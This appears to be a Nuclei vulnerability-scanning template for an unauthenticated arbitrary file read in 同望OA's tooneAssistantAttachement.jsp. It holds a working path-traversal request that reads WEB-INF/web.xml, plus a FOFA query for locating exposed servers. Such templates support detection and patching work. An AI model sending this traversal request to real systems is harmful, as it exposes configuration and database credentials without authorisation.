http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - <web-app>
            - <context-param>
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /jsp/oa/app/webservice/tooneAssistant/tooneAssistantAttachement.jsp?filename=./../../../../../WEB-INF/web.xml HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
id: tongwangOA-tooneAssistantAttachement_jsp-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="loginAction.struts?actionType=blockLogin"
        同望OA tooneAssistantAttachement.jsp 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 同望OA tooneAssistantAttachement.jsp 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488008&idx=1&sn=000cae539fcdc3108050d6059a4d04f7&chksm=c267a73bf5102e2df26af1338e16910e3139f2df64ee3b28fc150cd1a145be56cd3635506443&token=48786214&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
        - 同望OA
